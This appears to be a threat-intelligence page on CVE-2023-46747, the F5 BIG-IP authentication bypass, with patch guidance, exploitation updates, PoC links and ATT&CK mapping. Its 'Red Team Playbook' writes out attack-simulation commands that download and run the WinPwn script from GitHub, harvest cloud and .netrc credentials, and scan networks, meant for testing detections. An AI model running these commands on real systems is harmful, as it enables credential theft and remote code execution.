CVE-2023-46747

CRITICAL CISA KEV EXPLOIT POC TTE Zero-Day Pub 26/10 Upd 21/10

Overview

This vulnerability is an authentication bypass in the F5 BIG-IP Configuration utility (TMUI) caused by improper request handling that allows unauthorized requests to circumvent authentication controls. The root cause lies in the TMUI's failure to validate certain crafted HTTP requests, specifically involving AJP request smuggling techniques, affecting the management interface and self IP address access points. The flaw resides in the access policy manager component, enabling attackers to interact with privileged management endpoints without valid credentials.

Vulnerability Description

Undisclosed requests may bypass configuration utility authentication, allowing an attacker with network access to the BIG-IP system through the management port and/or self IP addresses to execute arbitrary system commands.  Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated

Impact

An unauthenticated attacker with network access to the management port or self IP addresses can bypass authentication and execute arbitrary system commands on the BIG-IP device. This enables full system compromise, including control over critical network infrastructure components. No prior credentials or user interaction are required, allowing attackers to escalate privileges, disrupt services, or exfiltrate sensitive configuration data, severely impacting organizational security posture.

Solution

F5 Networks has released security updates addressing this vulnerability; administrators should apply patches as detailed in the vendor advisory K000137353 available at https://my.f5.com/manage/s/article/K000137353. The advisory provides fixed versions of BIG-IP Access Policy Manager and instructions for verification. Organizations should prioritize upgrading to supported, patched versions and follow vendor guidance to mitigate exploitation risks.

EPSS vs KEV Prediction — Evolution (30 days)

Full Analysis

The vulnerability in the BIG-IP system's configuration utility presents a critical security flaw that allows unauthorized requests to bypass authentication mechanisms. This vulnerability stems from improper handling of requests, which enables an attacker with network access to the management port or self IP addresses to execute arbitrary system commands. The implications of this flaw are severe, as it undermines the integrity of the system and exposes it to a range of potential attacks, including unauthorized access and control over sensitive configurations.

Attack vectors for this vulnerability are particularly concerning due to the ease with which an attacker can exploit it. By leveraging network access, an attacker can send crafted requests that the system fails to authenticate properly. This could occur in various scenarios, such as when an organization has misconfigured its network security settings, allowing external entities to reach the management interfaces. Once an attacker gains access, they can execute commands that could lead to data breaches, service disruptions, or even complete system takeover, making this vulnerability a prime target for malicious actors.

The real-world impact of this vulnerability can be devastating for businesses. Organizations relying on the affected BIG-IP products for application delivery, security, and traffic management may face significant operational risks. A successful exploitation could result in unauthorized changes to critical configurations, leading to service outages, data loss, or exposure of sensitive information. Additionally, the reputational damage from such incidents can lead to loss of customer trust and potential legal repercussions, especially for businesses in regulated industries where data protection is paramount.

To detect and mitigate this vulnerability, organizations must implement a multi-layered security approach. Regularly updating and patching affected systems is crucial, as it ensures that known vulnerabilities are addressed promptly. Network segmentation can also play a vital role in limiting access to management interfaces, reducing the attack surface. Employing intrusion detection systems (IDS) can help identify unusual traffic patterns indicative of exploitation attempts. Furthermore, organizations should conduct regular security audits and vulnerability assessments to identify and remediate potential weaknesses in their infrastructure.

In conclusion, the vulnerability within the BIG-IP system's configuration utility poses a significant threat to organizations that utilize these products. The potential for unauthorized access and command execution highlights the need for robust security measures and proactive management of network configurations. By understanding the nature of this vulnerability and implementing effective detection and mitigation strategies, organizations can better protect themselves against the risks associated with this critical flaw.




CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2023-46747, with telemetry indicating a significant uptick in activity through management and self IP interfaces. This increase coincides with a slight rise in the Exploit Prediction Scoring System (EPSS) score, reflecting growing confidence in the exploitability of this critical authentication bypass vulnerability. Concurrently, new proof-of-concept exploits have surfaced on public repositories, enhancing adversaries’ capabilities to execute unauthenticated remote code execution against vulnerable BIG-IP systems. The presence of ransomware-linked threat actors further elevates the risk profile, as these groups are known to leverage this vulnerability in targeted campaigns. For defenders, this evolving landscape underscores an urgent need to prioritize detection and monitoring efforts around this vulnerability, as the expanding exploit toolkit and active threat actor interest heighten the likelihood of successful compromise. Overall, these developments substantiate an increased threat level, warranting heightened vigilance and accelerated response measures within affected environments.



Update 2 — June 22, 2026

CSURFACE threat intelligence has identified a marked escalation in detection activity related to CVE-2023-46747, indicating increased adversary engagement with this critical F5 BIG-IP vulnerability. This surge in telemetry corresponds with a growing availability of proof-of-concept exploits, which have become more diverse and accessible, lowering the barrier for exploitation attempts. The persistence of ransomware-linked threat actors leveraging this vulnerability further amplifies the operational risk, as these groups are known to integrate such exploits into targeted intrusion campaigns. Although the exploit trend is not yet classified as rapidly increasing, the upward trajectory in both exploit development and observed activity suggests a heightened likelihood of successful compromise in unpatched environments. For defenders, this evolving threat landscape necessitates an elevated risk posture, as the convergence of active exploitation, expanding toolsets, and ransomware associations significantly intensifies the potential impact on affected networks.



Update 3 — July 08, 2026

CSURFACE threat intelligence has detected a slight increase in exploitation attempts targeting CVE-2023-46747, accompanied by the emergence of additional publicly available proof-of-concept exploits. This subtle uptick in activity, while not yet rapid, signals growing interest among threat actors, including ransomware-affiliated groups, in leveraging this critical vulnerability. The availability of multiple exploitation scripts lowers the barrier for adversaries to conduct unauthorized remote code execution against vulnerable F5 BIG-IP systems, thereby expanding the attack surface. Our telemetry indicates that this trend, although incremental, reflects a persistent and evolving threat environment that could facilitate more frequent and sophisticated intrusion campaigns. Consequently, the risk level for organizations running affected versions has increased modestly, underscoring the need for heightened vigilance as threat actors continue to refine their operational capabilities around this vulnerability.

Affected Products (100)

Vendor Product Version CPE
f5 F5 Big-Ip Access Policy Manager All cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*
f5 F5 Big-Ip Access Policy Manager All cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*
f5 F5 Big-Ip Access Policy Manager All cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*
f5 F5 Big-Ip Access Policy Manager All cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*
f5 F5 Big-Ip Access Policy Manager All cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*
f5 F5 Big-Ip Advanced Firewall Manager All cpe:2.3:a:f5:big-ip_advanced_firewall_manager:*:*:*:*:*:*:*:*
f5 F5 Big-Ip Advanced Firewall Manager All cpe:2.3:a:f5:big-ip_advanced_firewall_manager:*:*:*:*:*:*:*:*
f5 F5 Big-Ip Advanced Firewall Manager All cpe:2.3:a:f5:big-ip_advanced_firewall_manager:*:*:*:*:*:*:*:*
f5 F5 Big-Ip Advanced Firewall Manager All cpe:2.3:a:f5:big-ip_advanced_firewall_manager:*:*:*:*:*:*:*:*
f5 F5 Big-Ip Advanced Firewall Manager All cpe:2.3:a:f5:big-ip_advanced_firewall_manager:*:*:*:*:*:*:*:*
f5 F5 Big-Ip Advanced Web Application Firewall All cpe:2.3:a:f5:big-ip_advanced_web_application_firewall:*:*:*:*:*:*:*:*
f5 F5 Big-Ip Advanced Web Application Firewall All cpe:2.3:a:f5:big-ip_advanced_web_application_firewall:*:*:*:*:*:*:*:*
f5 F5 Big-Ip Advanced Web Application Firewall All cpe:2.3:a:f5:big-ip_advanced_web_application_firewall:*:*:*:*:*:*:*:*
f5 F5 Big-Ip Advanced Web Application Firewall All cpe:2.3:a:f5:big-ip_advanced_web_application_firewall:*:*:*:*:*:*:*:*
f5 F5 Big-Ip Advanced Web Application Firewall All cpe:2.3:a:f5:big-ip_advanced_web_application_firewall:*:*:*:*:*:*:*:*
f5 F5 Big-Ip Carrier-Grade Nat All cpe:2.3:a:f5:big-ip_carrier-grade_nat:*:*:*:*:*:*:*:*
f5 F5 Big-Ip Carrier-Grade Nat All cpe:2.3:a:f5:big-ip_carrier-grade_nat:*:*:*:*:*:*:*:*
f5 F5 Big-Ip Carrier-Grade Nat All cpe:2.3:a:f5:big-ip_carrier-grade_nat:*:*:*:*:*:*:*:*
f5 F5 Big-Ip Carrier-Grade Nat All cpe:2.3:a:f5:big-ip_carrier-grade_nat:*:*:*:*:*:*:*:*
f5 F5 Big-Ip Carrier-Grade Nat All cpe:2.3:a:f5:big-ip_carrier-grade_nat:*:*:*:*:*:*:*:*
+80 additional CPEs
Warning: The exploits and proof-of-concept (PoC) code listed below are sourced from third-party public repositories. CSURFACE assumes no responsibility for the content, accuracy, or safety of these resources. Use at your own risk. Learn more

Metasploit (1)

Module Authors Rank Platform Link
F5 BIG-IP TMUI AJP Smuggling RCE
exploits/linux/http/f5_bigip_tmui_rce_cve_2023_46747
Michael Weber, Thomas Hendrickson, Sandeep Singh +1 Unknown unix, linux View

GitHub PoCs (9)

Repository Author Stars Forks Date Link
W01fh4cker/CVE-2023-46747-RCE
exploit for f5-big-ip RCE cve-2023-46747
W01fh4cker 208 47 2023-11-01 View
nvansluis/test_cve-2023-46747
nvansluis 7 1 2023-11-02 View
maniak-academy/Mitigate-CVE-2023-46747
maniak-academy 2 3 2023-11-01 View
Razzlemouse/F5-BIG-IP-SmuggleShell-CVE-2023-46747-Exploit
#F5-BIG-IP-CVE-2023-46747-Exploit – Unauthenticated RCE Python exploit & Nuclei template by Raguraman ✓ Automated TC...
Razzlemouse 4 1 2025-12-03 View
RevoltSecurities/CVE-2023-46747
An Exploitation script developed to exploit the CVE-2023-46747 which Pre Auth Remote Code Execution of f5-BIG Ip producs
RevoltSecurities 3 0 2023-11-03 View
vidura2/cve-2023-46747
vidura2 2 0 2024-02-11 View
fu2x2000/CVE-2023-46747
CVE-2023-46747 Criticle Auth Bypass
fu2x2000 0 1 2023-11-01 View
rainbowhatrkn/CVE-2023-46747-RCE
exploit for f5-big-ip RCE cve-2023-46747
rainbowhatrkn 0 0 2024-03-15 View
cediegreyhat/BigFinger
CVE-2023-46747-RCE PoC
cediegreyhat 0 0 2025-07-04 View
Exploited in Wild CONFIRMED
Ransomware IN USE
Attacker Interest MEDIUM
Sightings Few sightings

Ransomware Groups 1

ransomhub
CONFIRMED
842 victims
ransomware.live
2026-06-25

Threat Feed

15 events
2026-07-09
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-30
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-25
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-25
Exploited by ransomhub

Ransomware group known to exploit this vulnerability. Tools: Acronis Disk Director, Angry IP Scanner, AnyDesk, Atera, BITSAdmin (842 known victims)

2026-06-23
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-22
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-19
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-13
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-04
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-05-05
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-04-05
Exploited by ransomhub

Ransomware group known to exploit this vulnerability. Tools: Acronis Disk Director, Angry IP Scanner, AnyDesk, Atera, BITSAdmin (842 known victims)

2026-03-17
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2023-11-01
PoC Published (9 GitHub repositories)

Proof-of-concept code is publicly available for this vulnerability

2023-10-31
Added to CISA KEV Catalog

CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog

2023-10-26
Exploit Published (0 ExploitDB, 1 Metasploit)

Public exploit code is available for this vulnerability

Likely Kill Chain

Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.

Applicable Out of scope
Initial Access
TA0001
Execution
TA0002
Persistence
TA0003
Priv. Escalation
TA0004
Defense Evasion
TA0005
Credential Access
TA0006
Lateral Movement
TA0008
Collection
TA0009
Impact
TA0040

Kill chain derived from the ML classifier.

Attack Vectors ML

Authentication Bypass
100% auth_bypass
Insecure Direct Object Reference
42% idor
Privilege Escalation
35% privilege_escalation

MITRE ATT&CK Techniques (6)

The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.

ID Name Stage Tactics Platforms Link
T1190 Exploit Public-Facing Application Initial Access initial-access Containers, ESXi, IaaS, Linux, macOS, Network Devices, Windows
T1059 Command and Scripting Interpreter Kill Chain execution ESXi, IaaS, Identity Provider, Linux, macOS, Network Devices, Office Suite, Windows
T1542.001 System Firmware Kill Chain persistence, defense-evasion Windows, Network Devices
T1552.001 Credentials In Files Kill Chain credential-access Containers, IaaS, Linux, macOS, Windows
T1046 Network Service Discovery Kill Chain discovery Containers, IaaS, Linux, macOS, Network Devices, Windows
T1021.004 SSH Kill Chain lateral-movement ESXi, Linux, macOS

CAPEC Attack Patterns ML

ID Name ML Conf. Likelihood Severity Link
CAPEC-12 Choosing Message Identifier
38%
High High
CAPEC-62 Cross Site Request Forgery
38%
High Very High
CAPEC-36 Using Unpublished Interfaces or Functionality
35%
Medium High
CAPEC-166 Force the System to Reset Values
31%
Medium
CAPEC-216 Communication Channel Manipulation
30%

Red Team Playbook

33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.

T1021.004 ESXi - Enable SSH via PowerCLI Windows PowerShell Privileged
An adversary enables the SSH service on a ESXi host to maintain persistent access to the host and to carryout subsequent operations.
Command (PowerShell)
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false 
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
T1021.004 ESXi - Enable SSH via VIM-CMD Windows CMD
An adversary enables SSH on an ESXi host to maintain persistence and creeate another command execution interface. [Reference](https://lolesxi-project.github.io/LOLESXi/lolesxi/Binaries/vim-cmd/#enable%20service)
Command (CMD)
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
T1046 Network Service Discovery for Containers containers Shell
Attackers may try to obtain a list of services that are operating on remote hosts and local network infrastructure devices, in order to identify potential vulnerabilities that can be exploited through remote software attacks. They typically use tools to conduct port and...
Command (Shell)
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
T1046 Port Scan Linux, macOS Bash
Scan ports to check for listening ports. Upon successful execution, sh will perform a network connection against a single host (192.168.1.1) and determine what ports are open in the range of 1-65535. Results will be via stdout.
Command (Bash)
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
T1046 Port Scan NMap for Windows Windows PowerShell Privileged
Scan ports to check for listening ports for the local host 127.0.0.1
Command (PowerShell)
nmap #{host_to_scan}
T1046 Port Scan Nmap Linux, macOS Shell Privileged
Scan ports to check for listening ports with Nmap. Upon successful execution, sh will utilize nmap, telnet, and nc to contact a single or range of addresses on port 80 to determine if listening. Results will be via stdout.
Command (Shell)
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
T1046 Port Scan using nmap (Port range) Linux, macOS Shell Privileged
Scan multiple ports to check for listening ports with nmap
Command (Shell)
nmap -Pn -sV -p #{port_range} #{host}
T1046 Port Scan using python Windows PowerShell
Scan ports to check for listening ports with python
Command (PowerShell)
python "#{filename}" -i #{host_ip}
T1046 Port-Scanning /24 Subnet with PowerShell Windows PowerShell
Scanning common ports in a /24 subnet. If no IP address for the target subnet is specified the test tries to determine the attacking machine's "primary" IPv4 address first and then scans that address with a /24 netmask. The connection attempts to use a timeout parameter in...
Command (PowerShell)
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
    $ip_list = $ipAddr -split ","
    $ip_list = $ip_list.ForEach({ $_.Trim() })
    Write-Host "[i] IP Address List: $ip_list"

    $ports = #{port_list}

    foreach ($ip in $ip_list) {
        foreach ($port in $ports) {
            Write-Host "[i] Establishing connection to: $ip : $port"
            try {
                $tcp = New-Object Net.Sockets.TcpClient
                $tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
            } catch {}
            if ($tcp.Connected) {
                $tcp.Close()
                Write-Host "Port $port is open on $ip"
            }
        }
    }
} elseif ($ipAddr -notlike "*,*") {
    if ($ipAddr -eq "") {
        # Assumes the "primary" interface is shown at the top
        $interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
        Write-Host "[i] Using Interface $interface"
        $ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
    }
    Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
    $subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
    # Always assumes /24 subnet
    Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"

    $ports = #{port_list}
    $subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }

    foreach ($ip in $subnetIPs) {
        foreach ($port in $ports) {
            try {
                $tcp = New-Object Net.Sockets.TcpClient
                $tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
            } catch {}
            if ($tcp.Connected) {
                $tcp.Close()
                Write-Host "Port $port is open on $ip"
            }
        }
    }
} else {
    Write-Host "[Error] Invalid Inputs"
    exit 1
}
T1046 Remote Desktop Services Discovery via PowerShell Windows PowerShell Privileged
Availability of remote desktop services can be checked using get- cmdlet of PowerShell
Command (PowerShell)
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
T1046 WinPwn - MS17-10 Windows PowerShell
Search for MS17-10 vulnerable Windows Servers in the domain using powerSQL function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
T1046 WinPwn - bluekeep Windows PowerShell
Search for bluekeep vulnerable Windows Systems in the domain using bluekeep function of WinPwn. Can take many minutes to complete (~600 seconds in testing on a small domain).
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
T1046 WinPwn - fruit Windows PowerShell
Search for potentially vulnerable web apps (low hanging fruits) using fruit function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
T1046 WinPwn - spoolvulnscan Windows PowerShell
Start MS-RPRN RPC Service Scan using spoolvulnscan function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
T1059 AutoIt Script Execution Windows PowerShell
An adversary may attempt to execute suspicious or malicious script using AutoIt software instead of regular terminal like powershell or cmd. Calculator will popup when the script is executed successfully.
Command (PowerShell)
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
T1542.001 UEFI Persistence via Wpbbin.exe File Creation Windows PowerShell Privileged
Creates Wpbbin.exe in %systemroot%. This technique can be used for UEFI-based pre-OS boot persistence mechanisms. - https://grzegorztworek.medium.com/using-uefi-to-inject-executable-files-into-bitlocker-protected-drives-8ff4ca59c94c -...
Command (PowerShell)
echo "Creating %systemroot%\wpbbin.exe"      
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
T1552.001 Access unattend.xml Windows CMD Privileged
Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored. If these files exist, their contents will be displayed. They are used to store credentials/answers during the unattended windows install process.
Command (CMD)
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
T1552.001 Extract Browser and System credentials with LaZagne macOS Bash Privileged
[LaZagne Source](https://github.com/AlessandroZ/LaZagne)
Command (Bash)
python2 laZagne.py all
T1552.001 Extract passwords with grep Linux, macOS Shell
Extracting credentials from files
Command (Shell)
grep -ri password #{file_path}
exit 0
T1552.001 Extracting passwords with findstr Windows PowerShell
Extracting Credentials from Files. Upon execution, the contents of files that contain the word "password" will be displayed.
Command (PowerShell)
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
T1552.001 Find AWS credentials Linux, macOS Shell
Find local AWS credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
T1552.001 Find Azure credentials Linux, macOS Shell
Find local Azure credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
T1552.001 Find GCP credentials Linux, macOS Shell
Find local Google Cloud Platform credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
T1552.001 Find OCI credentials Linux, macOS Shell
Find local Oracle cloud credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
T1552.001 Find and Access Github Credentials Linux, macOS Bash
This test looks for .netrc files (which stores github credentials in clear text )and dumps its contents if found.
Command (Bash)
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
T1552.001 List Credential Files via Command Prompt Windows CMD Privileged
Via Command Prompt,list files where credentials are stored in Windows Credential Manager
Command (CMD)
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
T1552.001 List Credential Files via PowerShell Windows PowerShell Privileged
Via PowerShell,list files where credentials are stored in Windows Credential Manager
Command (PowerShell)
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
T1552.001 WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials Windows PowerShell
Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials technique via function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive  
T1552.001 WinPwn - SessionGopher Windows PowerShell
Launches SessionGopher on this system via WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
T1552.001 WinPwn - Snaffler Windows PowerShell
Check Domain Network-Shares for cleartext passwords using Snaffler function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
T1552.001 WinPwn - passhunt Windows PowerShell
Search for Passwords on this system using passhunt via WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
T1552.001 WinPwn - powershellsensitive Windows PowerShell
Check Powershell event logs for credentials or other sensitive information via winpwn powershellsensitive function.
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
T1552.001 WinPwn - sensitivefiles Windows PowerShell
Search for sensitive files on this local system using the SensitiveFiles function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput

Detection & Response Rules

No detection or response rules found for this CVE.

No news articles found for this CVE.

References (5)

Title Tags URL
nvd.nist.gov
NVD reference
https://nvd.nist.gov/vuln/detail/CVE-2023-46747
my.f5.com
GitHub CVE vendor-advisory
https://my.f5.com/manage/s/article/K000137353
packetstormsecurity.com
GitHub CVE
http://packetstormsecurity.com/files/175673/F5-BIG-IP-TMUI-AJP-Smuggling-Remote-Command-Execution.html
secpod.com
GitHub CVE
https://www.secpod.com/blog/f5-issues-warning-big-ip-vulnerability-used-in-active-exploit-chain/
cisa.gov
NVD API US Government Resource
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2023-46747